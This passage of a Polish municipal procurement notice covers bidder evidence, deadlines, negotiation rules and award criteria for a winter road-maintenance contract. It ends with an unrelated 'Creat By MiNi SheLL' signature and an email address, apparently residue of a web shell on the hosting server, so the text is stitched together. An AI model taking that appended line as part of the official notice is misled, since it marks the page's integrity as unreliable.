odśnieżny, oraz posypywarkę <br/>do posypywania piaskiem / mieszanką piaskowo-solną.– załącznik nr 9 do SWZ<br/>1.3. Wykonawca Wykaże Opłaconą polisę a w przypadku jej braku inny dokument <br/>że jest ubezpieczony od odpowiedzialności cywilnej w zakresie <br/>prowadzonej działalności związanej z przedmiotem zamówienia minimum <br/>na kwotę: 500 000,00 zł (pięćset tysięcy złotych 00/100<br/>Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć wymaganych przez <br/>Zamawiającego podmiotowych środków dowodowych, o których w pkt. 1.7; <br/>Wykonawca składa inne podmiotowe środki dowodowe, które w wystarczający <br/>sposób potwierdzają spełnienie opisanego przez Zamawiającego warunku udziału <br/>w postępowaniu dotyczącego sytuacji ekonomicznej lub finansowej<br/>1.4. Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej <br/>Ewidencji i Informacji o Działalności Gospodarczej,<br/>1.5. Zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, <br/>że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie <br/>art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące <br/>przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków <br/>lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów <br/>potwierdzających, że odpowiednio przed upływem terminu składania <br/>wniosków o dopuszczenie do udziału w postępowaniu<br/>1.6. Zaświadczenia albo innego dokumentu właściwej terenowej jednostki <br/>organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału <br/>regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia <br/>Społecznego potwierdzającego że wykonawca nie zalega z opłacaniem <br/>składek na ubezpieczenia <br/>1.7. Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, <br/>o którym mowa w art. 125 ust. 1– załącznik nr 6 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość dokonywania zmian umowy w granicach wyznaczonych przepisami ustawy Pzp w tym art 455 ustawy Pzp <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-03 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://pysznica.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-03 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-12-02</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Cena; Czas reakcji w okresie prowadzonej akcji ZUD <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający przewiduje możliwości unieważnienia postępowania o udzielenie zamówienia na podstawie art. 255 ustawy Pzp. Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością prowadzenia negocjacji z trzema Wykonawcami których oferty zostały najwyżej ocenione. 3. Informacja dotycząca wyboru najkorzystniejszej oferty z możliwością prowadzenia negocjacji: a. Zamawiający przewiduje możliwość prowadzenia negocjacji z trzema Wykonawcami których oferty zostały najwyżej ocenione w celu ulepszenia treści ofert, które podlegają ocenie w ramach kryteriów oceny ofert, a po zakończeniu negocjacji Zamawiający zaprosi tychże trzech najwyżej ocenionych Wykonawców do składania ofert dodatkowych (art. 275 pkt 2) ustawy Pzp. W przypadku gdy liczba złożonych ofert będzie mniejsza niż 3 Zamawiając będzie kontynuował postępowanie zgodnie z art. 288 i 289 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz. U. z 2024 r. poz. 1320 z późn. zm.) 3 b. Negocjacje treści ofert nie mogą prowadzić do zmiany treści SWZ oraz dotyczą wyłącznie kryterium ceny. OPIS KRYTERIÓW OCENY OFERT WRAZ Z PODANIEM WAG TYCH KRYTERIÓW I SPOSOBU OCENY OFERT 1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert: 1) Cena – waga kryterium 60%; 2) Czas reakcji w okresie prowadzonej akcji ZUD – waga kryterium 40%. 2. Zamawiający dokona oceny ofert przyznając punkty w ramach kryterium, przyjmując zasadę, że 1 % = 1 punkt. 3. Punkty za kryterium „Cena” zostaną obliczone według wzoru: Cena oferty najtańszej ------------------------------- x 60 pkt Cena oferty badanej 34 Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku. 4. Kryterium – Czas reakcji w okresie prowadzonej akcji ZUD (maksymalny czas na rozpoczęcie pracy po przekazaniu dyspozycji) zostanie określone na podstawie poniższego wykazu: Lp. Opis miejsca pracy sprzętu Kryterium Waga 1. jezdnie dróg / chodniki / ścieżki rowerowe (czas rozpoczęcia pracy od powiadomienia) Czas reakcji: 2,5 h – 0 pkt 2 h – 10 pkt 1,5 h – 20 pkt 1 h – 30 pkt 0,5 h - 40 pkt 40 % UWAGA!!! a) Podanie wartości pośredniej czasu reakcji, zostanie przyjęta jako niższa wg punktacji. 1. Suma punktów uzyskanych za wszystkie kryteria oceny ofert (P cn + G n ) stanowić będzie końcową ocenę danej oferty. .

Creat By MiNi SheLL
Email: jattceo@gmail.com